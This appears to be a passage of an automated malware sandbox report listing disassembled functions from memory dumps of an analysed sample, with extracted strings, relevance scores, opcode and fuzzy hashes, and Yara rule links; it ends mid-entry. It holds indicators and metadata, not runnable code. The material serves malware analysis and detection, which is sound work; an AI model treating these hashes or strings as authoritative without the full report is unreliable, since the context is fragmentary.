Function 044073A8 Relevance: 3.0, Strings: 2, Instructions: 470COMMON

Download Yara Rule

Strings

cfbe, xrefs: 0440764F
2PBb, xrefs: 04407A36

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 2PBb$cfbe
API String ID: 0-517685108
Opcode ID: 2cccfbb5d267f8f8491c01e49efb610de094c8bfb3e74e625019bdc8333cdebc
Instruction ID: 0def2451837eb4a5d8112b79a4ed2a3c622d28f3b4af1724a38f309b07f67f20
Opcode Fuzzy Hash: 2cccfbb5d267f8f8491c01e49efb610de094c8bfb3e74e625019bdc8333cdebc
Instruction Fuzzy Hash: 60F17C70504B408EEB29CF35C498BE3BBE1AF56305F088A6DC0EB8B292D775B545CB55

Function 043E56C7 Relevance: 3.0, Strings: 2, Instructions: 451COMMON

Download Yara Rule

Strings

IEND, xrefs: 043E5B99
), xrefs: 043E5778

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 652d2c7e87a85901377227d95560b9378b1016cb294ce33098a1212efe0b6641
Instruction ID: fbd848bf8e85cb03f42693ffd6013325eba1de93f9ecf5ae67fcf729d86b6ab8
Opcode Fuzzy Hash: 652d2c7e87a85901377227d95560b9378b1016cb294ce33098a1212efe0b6641
Instruction Fuzzy Hash: DEF1F171A09354AFE714CF69CC8076ABBE5AF84308F05952DF9999B3C0D779E904CB82

Function 004242B2 Relevance: 2.8, Strings: 2, Instructions: 289COMMON

Download Yara Rule

Strings

[M, xrefs: 004242BB
IP, xrefs: 004242C2

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: IP$[M
API String ID: 0-4017197820
Opcode ID: 4a3744df02fe76745d1abf2964e5cc205279408301d7fd9baafdc4c54c6b28d4
Instruction ID: b3c57116afc10e7119c3cd764a18fe336843f4a3cdcf224629ed181af22ef122
Opcode Fuzzy Hash: 4a3744df02fe76745d1abf2964e5cc205279408301d7fd9baafdc4c54c6b28d4
Instruction Fuzzy Hash: 44B12771600B118FD325CF29D490B62B7F1FF86314F14895ED89A8BBA6E778E841CB94

Function 0041D75D Relevance: 2.4, APIs: 1, Instructions: 875COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 006d50049d3e5e011efdf29e049a16c245cae7292e5eff2ed98d43689107f87b
Instruction ID: f9e56a82b05e1df0b453c80ea583c6e607638f02eae9a17844a3f9c670613295
Opcode Fuzzy Hash: 006d50049d3e5e011efdf29e049a16c245cae7292e5eff2ed98d43689107f87b
Instruction Fuzzy Hash: 2F62A979614B01CFD728CF29D890A62B3E2FF4A715F18896DD496877A1DB38F942CB04

Function 0040105C Relevance: 2.1, Strings: 1, Instructions: 893COMMON

Download Yara Rule

Strings

JJJJKRJJJJOLJJJJJJJJUE@JJJEYMFJ]JJJJJJJJJJJJJJacgNJJkmJJEmJJDEJJ, xrefs: 00401438

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: JJJJKRJJJJOLJJJJJJJJUE@JJJEYMFJ]JJJJJJJJJJJJJJacgNJJkmJJEmJJDEJJ
API String ID: 0-2695270438
Opcode ID: f4495b8307a68494cd019a634ad2b0ac0c9f59ca6c57951b7228fedb697986cc
Instruction ID: 5a53960e5e99ff852378f1f3cacc28ccea2b8a6316681f3d1666e51c591a0de8
Opcode Fuzzy Hash: f4495b8307a68494cd019a634ad2b0ac0c9f59ca6c57951b7228fedb697986cc
Instruction Fuzzy Hash: BF72D479D18155CFEB04CF74E8512EABBB1FB4A311F1984B5C640A7391C3399A61CFA4

Function 0042B8F8 Relevance: 1.8, APIs: 1, Instructions: 299COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 0042B901

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: dfd89a4ccd0c08250bcb09e53ee6d7f95ea7c4ee0fd4c51b1003d309a7257226
Instruction ID: 42be1e3cf22912501ef8412a887be0e9569f9cf30671d2b51b0db905474ce322
Opcode Fuzzy Hash: dfd89a4ccd0c08250bcb09e53ee6d7f95ea7c4ee0fd4c51b1003d309a7257226
Instruction Fuzzy Hash: 30C1CF72705B418BC329CA38C890756B7E2FF99324F588B6DC5AA8B7D5D735A802C781

Function 0440BB5F Relevance: 1.8, APIs: 1, Instructions: 299COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 0440BB68

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 8b0e6c68bd49d71366e1393b5992a8cfc6088dcbed3f9a7a8395df447fb745c1
Instruction ID: c06a1fbb7782feaff1aa8527174fe83b58df84b22ba29b5ebb033c7e24a611b0
Opcode Fuzzy Hash: 8b0e6c68bd49d71366e1393b5992a8cfc6088dcbed3f9a7a8395df447fb745c1
Instruction Fuzzy Hash: B9C1AF72605B418BC729CE38C890792B7E2FF99324F188B6DD5AA8B7D5D731B802C740

Function 00423354 Relevance: 1.8, Strings: 1, Instructions: 520COMMON

Download Yara Rule

Strings

A, xrefs: 00423418

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-837457580
Opcode ID: f9f783358b5269109f9220a132a501da3a8ce20495ba31771ccc46d2ee40c0b6
Instruction ID: dc9e3d6a0112926aef596b563eb1d738a036f633008c4ab63600aaa2aeca024c
Opcode Fuzzy Hash: f9f783358b5269109f9220a132a501da3a8ce20495ba31771ccc46d2ee40c0b6
Instruction Fuzzy Hash: 9502E0716083918FD718CF28D89071ABBF2AFCA711F488A6EE4958B3D1C379D901CB56

Function 043E9927 Relevance: 1.7, Strings: 1, Instructions: 416COMMON

Download Yara Rule

Strings

C, xrefs: 043E9D44

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: C
API String ID: 0-2515487769
Opcode ID: 7ca93d528caa81f148600c8337d4a07c8f607280ba0f7e9f0830643f593573c6
Instruction ID: 06bab032821df16b1c0a7e8a934e5df1f9d5e6d073b1f1b46a87aa198dff5f15
Opcode Fuzzy Hash: 7ca93d528caa81f148600c8337d4a07c8f607280ba0f7e9f0830643f593573c6
Instruction Fuzzy Hash: C8E13BB2B097618FC3188E1AC8D037AFBE7AFC5324F199A2DD4D5473D5D678A8018B81

Function 00439E00 Relevance: 1.7, Strings: 1, Instructions: 403COMMON

Download Yara Rule

Strings

`123, xrefs: 00439E46

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: `123
API String ID: 0-1835766495
Opcode ID: 87dc4cd516f2908d47f2f3a3cfbef89627638494afaffc00369c92b2e4d8ee3e
Instruction ID: 9fda998e5b53779469197c407c0096829d25e13110f56e14b6d3980a5ca47b81
Opcode Fuzzy Hash: 87dc4cd516f2908d47f2f3a3cfbef89627638494afaffc00369c92b2e4d8ee3e
Instruction Fuzzy Hash: 17D1AB36A5C211CFC704CF28D8D066AB7E1FB8A315F19897DD99987361C738E852CB85

Function 00439F10 Relevance: 1.6, Strings: 1, Instructions: 365COMMON

Download Yara Rule

Strings

6edc, xrefs: 00439F48

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 6edc
API String ID: 0-1865609195
Opcode ID: efcc31ad576bb0ab1bf98ad8bc1f82b9fe1e38a74fe7556d5d478581d6f056a3
Instruction ID: a947bf4d82c33b04369e6d94e994cd5a436f32f2cc8dd5924b30dc13854a369a
Opcode Fuzzy Hash: efcc31ad576bb0ab1bf98ad8bc1f82b9fe1e38a74fe7556d5d478581d6f056a3
Instruction Fuzzy Hash: 16C1BF76A5C211CFC704CF28D89065AB7E2FF8A314F19997DE89987361D738E842CB85

Function 043F8A6E Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

JM, xrefs: 043F8C39

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: JM
API String ID: 0-1126336605
Opcode ID: c4038672b05fe9c0286992e0aa91722f0722b4ca5779e264c8f9d9b684047ac5
Instruction ID: ab3cd06a9d2ec7726539715a1c71cb171ae19a2f7eb2274deb2c2ac3668ce79d
Opcode Fuzzy Hash: c4038672b05fe9c0286992e0aa91722f0722b4ca5779e264c8f9d9b684047ac5
Instruction Fuzzy Hash: FFA19EB05083418BC728DF14C891B6BB7F1FF86318F14991CE9D95B391E774A945CB86

Function 00426660 Relevance: 1.5, Strings: 1, Instructions: 282COMMON

Download Yara Rule

Strings

XXSR, xrefs: 0042681D

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: XXSR
API String ID: 0-1503770902
Opcode ID: 3300ca780a6572115ef58226ef7a9cc96e6e10f625673a8631c78ac36c35c7a8
Instruction ID: 3f6c5290344e5c4500dd3b4d36036e16ab1f49c7d610ea51dbb7ce8487f4ca7e
Opcode Fuzzy Hash: 3300ca780a6572115ef58226ef7a9cc96e6e10f625673a8631c78ac36c35c7a8
Instruction Fuzzy Hash: 659139742057A08BD7298F399090767FBE2BF96304F55465EC4EB4B3C2D738A405CB59

Function 044068C7 Relevance: 1.5, Strings: 1, Instructions: 282COMMON

Download Yara Rule

Strings

XXSR, xrefs: 04406A84

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: XXSR
API String ID: 0-1503770902
Opcode ID: 6b4b5238bc354e4c6f97065c5e6529fe4172b9814de126df8102ac6f8c4c8079
Instruction ID: a211fdd316845e8a17e19c23aa6b319ee0c63ab6c73a910edec731ba0d7a4b79
Opcode Fuzzy Hash: 6b4b5238bc354e4c6f97065c5e6529fe4172b9814de126df8102ac6f8c4c8079
Instruction Fuzzy Hash: 469104702047918BDB398F298090766FBF2AF96314F19866EC4EB4B7C2D734B425CB15

Function 00407310 Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

,, xrefs: 00407473

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 8a753e4ef43d9ac7563a6a5f7ca00e3c6cdc60860491f2aa2964d0dae52d4717
Instruction ID: 3735952492d2333ef5bfa57caaa27b36288f665e643391f15751e645f0eb639e
Opcode Fuzzy Hash: 8a753e4ef43d9ac7563a6a5f7ca00e3c6cdc60860491f2aa2964d0dae52d4717
Instruction Fuzzy Hash: A9B1287150D381ABD315CF68C84465BBFE0AF95304F444A2EF88897782C375EA18CB97

Function 0041289B Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

EO, xrefs: 004128AA

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: EO
API String ID: 0-716502462
Opcode ID: 27f4ff9b13142879e679f16fca5a89f29232179e29fa4f1bfb122cc2db08d835
Instruction ID: d6dec2e545dc0dd92d11149f06fff2085007f669165bdb82671efb9ea63001e9
Opcode Fuzzy Hash: 27f4ff9b13142879e679f16fca5a89f29232179e29fa4f1bfb122cc2db08d835
Instruction Fuzzy Hash: 9E5189716082408FD355EF28C890B6EFBF5AF86344F14492DE2C5C72A2D73AD996CB16

Function 004143D3 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

x, xrefs: 0041447A

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: x
API String ID: 0-2363233923
Opcode ID: 948ad9c121d3e29f70d134d7cbf671f7d776961e7525d64e3c51cf259919b8b7
Instruction ID: 5f2d7fbc2b5577e837b7b8346eb4e3c1362b790c53a7d6c6f5ad7e7c89a45094
Opcode Fuzzy Hash: 948ad9c121d3e29f70d134d7cbf671f7d776961e7525d64e3c51cf259919b8b7
Instruction Fuzzy Hash: 5B41D5716183808FD325CF68C495BDBFBE2BBC6304F484D2DE4899B281D7B99A05CB56

Function 043F463A Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

x, xrefs: 043F46E1

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: x
API String ID: 0-2363233923
Opcode ID: 948ad9c121d3e29f70d134d7cbf671f7d776961e7525d64e3c51cf259919b8b7
Instruction ID: a65f53c0a2a34fcd309138deece1a11b9236d73525c58647bac0e706c6623323
Opcode Fuzzy Hash: 948ad9c121d3e29f70d134d7cbf671f7d776961e7525d64e3c51cf259919b8b7
Instruction Fuzzy Hash: 5C4119706183808FD325CF64C894B9BF7E2BFD6304F481D2DE5898B291D7B5A609CB46

Function 043F7A74 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

%$', xrefs: 043F7B66

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: %$'
API String ID: 0-1094439344
Opcode ID: 26ed338586cfba176d84cc2ff46e339150741026b7d8b80401dd3f66e51d40b2
Instruction ID: 6361153e9594903a8801faa3956cc5465fc61bffe421ea5e451c3d79aff1deca
Opcode Fuzzy Hash: 26ed338586cfba176d84cc2ff46e339150741026b7d8b80401dd3f66e51d40b2
Instruction Fuzzy Hash: 8241EE75600A41DFD725CF29C890A51FBF2BF5A304B54899DD68A8BB21D736F911CB80

Function 00417C90 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

%$', xrefs: 004178FF

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: %$'
API String ID: 0-1094439344
Opcode ID: 85435d21e26b1430776de7eeb190338686df2cb84fc77279f6cef0864f76a6ae
Instruction ID: 738eb74805bb83f3337e8e33e5fb2b644e700e810b3f74be095d1f0a826b0b31
Opcode Fuzzy Hash: 85435d21e26b1430776de7eeb190338686df2cb84fc77279f6cef0864f76a6ae
Instruction Fuzzy Hash: 9A31A975604600DFE720CF2AC880B56BBF1FF0A304F54896DE58A8B761D735E950CB95

Function 00438351 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

0C1, xrefs: 004383CF

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 0C1
API String ID: 0-488757619
Opcode ID: 38f68099f016c08fdd78a9a3f511e142b8d6a6c5d249821d0972f2918d2af20b
Instruction ID: 6606833eb71fe7264af2c6dde38a204e39c74fa7fbce84cd3499b413b25c7715
Opcode Fuzzy Hash: 38f68099f016c08fdd78a9a3f511e142b8d6a6c5d249821d0972f2918d2af20b
Instruction Fuzzy Hash: 6011D3752112028FD768CF18C591B26F7E2FB8A304B299A5ED0C68BB52C739E845CB84

Function 044185B8 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

0C1, xrefs: 04418636

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0C1
API String ID: 0-488757619
Opcode ID: 38f68099f016c08fdd78a9a3f511e142b8d6a6c5d249821d0972f2918d2af20b
Instruction ID: 09d032e8e7a7a8a676d658e9fee0612b97fb8d5e7682b698e3dd106e1d387893
Opcode Fuzzy Hash: 38f68099f016c08fdd78a9a3f511e142b8d6a6c5d249821d0972f2918d2af20b
Instruction Fuzzy Hash: F811E5752112028FD768CF18C595B26F7F2FB4A304B299A5DD0C6DBB52C735E846CB84

Function 004089E0 Relevance: .8, Instructions: 834COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f82889ee931554e2ff5978cac6c91023d9c07c856ed1160b12ac541747d6033
Instruction ID: d612faed8588b27f24a5d71e582fbd3ec7653526b84e9dc4bf4d3660a8ed20a0
Opcode Fuzzy Hash: 6f82889ee931554e2ff5978cac6c91023d9c07c856ed1160b12ac541747d6033
Instruction Fuzzy Hash: 0A42D5316087118BC7249F18D98066BB3E1FFD4315F198A3ED9D6972C6EB38A851CB4A

Function 043E8C47 Relevance: .8, Instructions: 834COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f76fb59e96d599cec20233f9686d25ff0e0042d4cd6056ec53ac408d872ec7
Instruction ID: c8ccced40ae59ae56cecbc059c1e674d52624f3836f3e869ade8772d4d91f3a7
Opcode Fuzzy Hash: 44f76fb59e96d599cec20233f9686d25ff0e0042d4cd6056ec53ac408d872ec7
Instruction Fuzzy Hash: 85423571A097258BC728DF5AD8807BAB3E1FFC4314F199A2DD986872C1E735B451CB42

Function 00403F00 Relevance: .8, Instructions: 753COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efc23a85d7377578bd26e6a10fa0932c18fdae4d7ed4240cfbed06fb79a6d9ef
Instruction ID: 5e30e1d036887f0204c51c1dad49e4a5d8749726d1d1f561b4a22f3293bf4c92
Opcode Fuzzy Hash: efc23a85d7377578bd26e6a10fa0932c18fdae4d7ed4240cfbed06fb79a6d9ef
Instruction Fuzzy Hash: 5262BFB55087418FC314CF29C08066AB7E1BF98314F148A7EE6DAA7391D739E945CB4A

Function 043E4167 Relevance: .8, Instructions: 753COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efc23a85d7377578bd26e6a10fa0932c18fdae4d7ed4240cfbed06fb79a6d9ef
Instruction ID: 85f377a183ccc4b028f5fdb6836640072875dd9cdcd902aa3ff5b87b642a895e
Opcode Fuzzy Hash: efc23a85d7377578bd26e6a10fa0932c18fdae4d7ed4240cfbed06fb79a6d9ef
Instruction Fuzzy Hash: 7D62AB716097618FC324CF2AC08067AF7E1BFA8314F188A6DE4DA97791D735B855CB82

Function 004399A0 Relevance: .7, Instructions: 729COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9f5d010156fcbc207d97237a74d997cdf126efff50ed6e42de6d451c09c6d10
Instruction ID: 5a26614c5048025443d9f80a0796454811a42c3a7914e1b2d88a113fafd7f41b
Opcode Fuzzy Hash: a9f5d010156fcbc207d97237a74d997cdf126efff50ed6e42de6d451c09c6d10
Instruction Fuzzy Hash: EA32BB79608241CFD318CF28D890A6AB7F2FF8A314F1989BDD49987361D734E852CB85

Function 00404A50 Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9955fae6f740cbb0178867e3ef523d8c9a8d848597f7a41d0e3d7bb622b77a98
Instruction ID: 313fdeb4d0baa2560dcb3b2a1c447a3994b7c3c00c584881cd090f0b12e8ca11
Opcode Fuzzy Hash: 9955fae6f740cbb0178867e3ef523d8c9a8d848597f7a41d0e3d7bb622b77a98
Instruction Fuzzy Hash: 9C4257B0514B118FC728CF28C59066AB7E1FF95310B648A2ED6A79BBC0D739F845CB58

Function 043E4CB7 Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f0828bb845e9ceedd11a05eb253248a524511fe697cc46a7ddc00008b208248
Instruction ID: 52e00afa16e41f4edae4d27e2cb6a077f59890c5fab7f70a87ef939052c72d87
Opcode Fuzzy Hash: 5f0828bb845e9ceedd11a05eb253248a524511fe697cc46a7ddc00008b208248
Instruction Fuzzy Hash: C7426670616B619FC728CF2AC58066AB7E1BF55314B94AA2DE5A78BFC0D335F441CB00

Function 004369D0 Relevance: .6, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3781e59cc65d88bba3782ead62bad8ab95147d18964dce5d97ac178b45e339
Instruction ID: 6f2124cebad87cc2b3cf8e417aa7e4cf0abdc2cf72fe1d01339d3440f65bdd5b
Opcode Fuzzy Hash: fd3781e59cc65d88bba3782ead62bad8ab95147d18964dce5d97ac178b45e339
Instruction Fuzzy Hash: CA127D71608342AFD714CF18C890A2BBBE2FB89314F199A2EF49597391D738ED05CB56

Function 04416C37 Relevance: .6, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11c4ce23dabf36e01eb90280243cfa949d7fb79454bf54c58f41a9ca140e0eb2
Instruction ID: 7e6dbe518c78a673b1552f653dcd537280428cf5233985ca820f38d5679909dc
Opcode Fuzzy Hash: 11c4ce23dabf36e01eb90280243cfa949d7fb79454bf54c58f41a9ca140e0eb2
Instruction Fuzzy Hash: 46127CB16083419BDB14CF18C880A2FBBE2AFC5314F198A2EF4959B3A1D775E945CB52

Function 00406D00 Relevance: .5, Instructions: 473COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37dcfb3abe7aa7eb99a918f18fbb26a07d3fb9cfcc0b32c4404566692974bd48
Instruction ID: 2d10c527325c0a4afb4d5a49c00f4b3ca567a1f26231b13bece1d813dfa96934
Opcode Fuzzy Hash: 37dcfb3abe7aa7eb99a918f18fbb26a07d3fb9cfcc0b32c4404566692974bd48
Instruction Fuzzy Hash: D302C23160C341CFC714CF68C98166BBBE1AF99304F18496EF9899B392D779E805CB96

Function 043E6F67 Relevance: .5, Instructions: 473COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b9c8f3b39d97d23cad7933a6be464636534165dff9c9857e648afe194dc4496
Instruction ID: f975ade45cfa78d69cb1c36e2132a0dadfd6e998c6eafb35f47a256305b407a2
Opcode Fuzzy Hash: 2b9c8f3b39d97d23cad7933a6be464636534165dff9c9857e648afe194dc4496
